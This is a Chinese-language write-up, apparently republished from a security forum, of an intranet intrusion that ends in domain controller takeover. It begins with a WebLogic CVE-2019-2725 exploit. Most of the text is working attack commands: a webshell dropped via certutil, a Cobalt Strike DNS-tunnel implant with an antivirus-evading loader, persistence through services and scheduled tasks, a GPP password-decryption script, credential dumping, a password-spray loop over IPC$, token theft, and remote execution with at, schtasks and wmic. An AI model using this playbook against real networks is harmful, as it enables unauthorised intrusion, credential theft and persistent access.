前言
内网搞的少,突然遇见一个,目的拿到域控就行了,期间有些其他操作就顺带提一下,主要写了拿域控这条线,目标外网ip:wip1,后面打码严重,见谅,技术比较菜,欢迎大佬们提出宝贵意见
打点
访问http://wip1/并添加一个随意路径,发现是weblogic
尝试利用weblogic的漏洞,CVE-2019-2725 成功
信息收集
ipconfig /all 发现存在域:gxxxxxxxxx.com
whoami /all 权限system
net user /domain 查看域用户(有点多)
net group "domain admins" /domain 查看域管理员 有 个administrator
net group "domain computers" /domain 查看域内主机名
net group "domain controllers" /domain 查看域控主机名,通过ping主机名 可以获取3台域控的ip
tasklist 查看进程有没杀软(存在卡巴斯基)
Netstat -ano 查看端口开放情况
arp -a 可以推测出内网可能有那些ip段和存活主机
query user || qwinsta 查看当前登陆用户(wip1/administrator登陆中)
主要的整理哈
-
目前知道内网有2个段当前主机内网ip为 192.xx.xx.x5
10.xx.xx.xx 和 192.xx.xx.xx
-
域控的ip为
192.xx.xx.x3 192.xx.xx.x2 10.xx.xx.x2
-
一些账号,一些主机名
为了方便后续操作,base64编码和解码写入jsp马(哥斯拉)
在利用certutil 解码:Certutil -decode a.txt a.jsp
内网渗透
CS 上线
因为存在卡巴,要绕过杀软,并且通过ping 外网是ping 不通的,可能改机器不能出网
dns隧道和加载器加载加密的shellcode实现上线
dns配置
配置方式如下买一个域名添加如下记录
cs中配置
用Stageless 的shellcode,也就是如下 不然可能会导致上线很慢或者不能上线
ip: 192.xx.xx.x5 上线
权限维持
创建自启动服务进行权限维持
sc create "xxx" binpath= "cmd /c start "C:/windows/temp/xxx.bat""&&sc config "xxx" start= auto&&net start xxx
成功上线
创建定时任务避免进程被杀 每周运行一次
schtasks /create /tn "xxx" /tr "C:/windows/temp/xxx.bat" /sc weekly /mo 1 /ru system
schtasks /run /tn "xxx"
成功上线
横向渗透
1.密码信息
-
收集存在gpp目录中的各种明文或者加密账号
shell dir \域名sysvol域名![一次真实内网渗透]( "一次真实内网渗透")
批量查看那些文件中包括password
shell findstr /s /i /m /c:"password" \域名SYSVOL域名Policies*.xml![一次真实内网渗透]( "一次真实内网渗透")
利用shell type 查看其中加密的密码
利用脚本解密
import sys
from Crypto.Cipher import AES
from base64 import b64decode
key = """
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
""".replace(" ","").replace("n","").decode('hex')
cpassword = "加密的字符串"
cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
password = b64decode(cpassword)
o = AES.new(key, AES.MODE_CBC, "x00" * 16).decrypt(password)
print o[:-ord(o[-1])].decode('utf16')
-
利用loagonpasswords 抓取密码,只抓到了本机administrator的密码
-
数据库账号密码
其实还有rdp登录,浏览器等密码(没抓取,先尝试以上秘密)
2.横向获取所有主机ip
思路
-
domain computers 组获取主机名 + ping
-
Spn获取主机名+ping
setspn -t /domain -q */* > spn.txt
因为dns实在太慢了,容易断开,而且该域比较大, 就没大规模ping和扫描, 通过看 domain computers 组 通过主机名发现了有些主机的功能, 通过ping 这些主机发现全都在192这个段,并且我们具有权限的那台主机也在这段,思考了哈就先弄192这个段吧
3.横向渗透
利用刚才获取的密码尝试192段 ,利用了cs自带psexec 等方法批量上线,发现都是不行的,应该是有杀软,只能手动来搞了
先利用进程注入一个administrator 权限的进程获得本地管理员权限
也可以利用令牌窃取获取本地管理员权限
批量尝试,建立了链接
for /L %I in (1,1,254) do @net use 192.xx.xx.%Iipc$ "刚才获取的密码" /user:administrator
查看那些主机有管理员登陆过(在这期间也拿了几个具有有外网ip的webshell)
shell tasklist /s ip /v
发现192.xx.xx.x0 这太主机上有域管进程并且存在卡巴
copy shellcode 和加载器到建立ipc链接的主机上
利用at 定时任务进行上线
shell net time \ip2 查看远程主机时间
shell at time ip 12:57 xxx.bat
等了一会,幸运的是,成功上线,同样走的dns,其实可以结合第一个shell 走smb 隧道
同样做好权限维持,查看端口发现有对外网的链接, 走http 隧道(可以利用云函数做中转隐藏cs服务IP)
上线
期间休息过一阵子没有弄,加载器被杀完了,重新改加载器,上线,但是at 命令没了(估计被发现了)......,换schtasks
schtasks /create /F /s 192.xx.xx.x0 /u administrator /p "密码" /tn test /tr "c:windowstempxxxxx.bat" /sc DAILY /mo 1 /st 13:20
目前上线2台,192.xx.xx.x0 有域管理登录过,要想获取域管理员权限,常见抓秘密和hash,但是可能第二次面杀不到位,失败,还有查找各个文件等等,就不试了,直接令牌窃取,获取域管理员权限
gxxxxxxxxxxxadministrator
接下来就是登录域控,发现定时任务不行了,尝试wmic
shell wmic /node:192.xx.xx.x3 process call create "cmd.exe /c whoami>f:xxxxxxresult.txt"
copy shellcode 和加载器到建立ipc链接的主机上,然后执行
shell wmic /node:192.xx.xx.x3 process call create "cmd.exe /c f:xxxxxxx.bat"
上线
差不多行了,数据那些就不下载了,也不维权了,交差,后面利用frp 随便访问了哈内网的web,找到一个弱口令,可以设置域策略
结束
太菜了太菜了
作者:ascii****,转载于:先知社区。
点击上方,关注公众号
如文章对你有帮助,请支持点下“赞”“在看”
本文始发于微信公众号(HACK之道):一次真实内网渗透
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论